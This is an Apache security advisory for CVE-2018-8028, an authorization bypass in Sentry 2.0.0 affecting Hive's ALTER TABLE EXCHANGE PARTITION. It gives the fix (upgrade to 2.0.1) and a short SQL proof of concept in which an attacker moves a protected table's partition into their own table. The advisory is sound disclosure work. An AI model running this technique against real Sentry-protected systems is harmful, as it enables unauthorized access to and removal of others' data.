[SECURITY] CVE-2018-8028: Bypass ALTER TABLE EXCHANGE PARTITIONS authorization for Hive
Severity: Major Vendor: The Apache Software Foundation Versions Affected: This vulnerability affects only the version of Apache Sentry 2.0.0 due to the introduction of Hive 2.x. Description: An authenticated user can execute ALTER TABLE EXCHANGE PARTITIONS without being authorized by Sentry. This can allow an attacker unauthorized access to the partitioned data of a Sentry protected table and can allow an attacker to remove data from a Sentry protected table. Mitigation: Apache Sentry users using 2.0.0 should upgrade to 2.0.1 or later. Example: The admin has created the following table in a database that the attacker doesn't have access to: > CREATE TABLE target_database1.aliens (name string) PARTITIONED BY (home_planet string, diet string); > ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='earth', diet='milk shakes'); > ALTER TABLE target_database1.aliens ADD PARTITION (home_planet='trapis-4', diet='sentient lifeforms with cheese'); The attacker has a database attacker_database, created as follows: > CREATE TABLE attacker_database.data_stealer (name string) PARTITIONED BY (home_planet string, diet string); > ALTER TABLE attacker_database.data_stealer EXCHANGE PARTITION (home_planet='earth', diet='milk shakes') WITH TABLE target_database1.aliens; The attacker now has access to all of the data in the target partitions with the privileges available to them on attacker_database. Credit: This issue was discovered by Benjamin Iglauer of Cloudera. References: https://cwiki.apache.org/confluence/display/SENTRY/Vulnerabilities+found+in+Apache+Sentry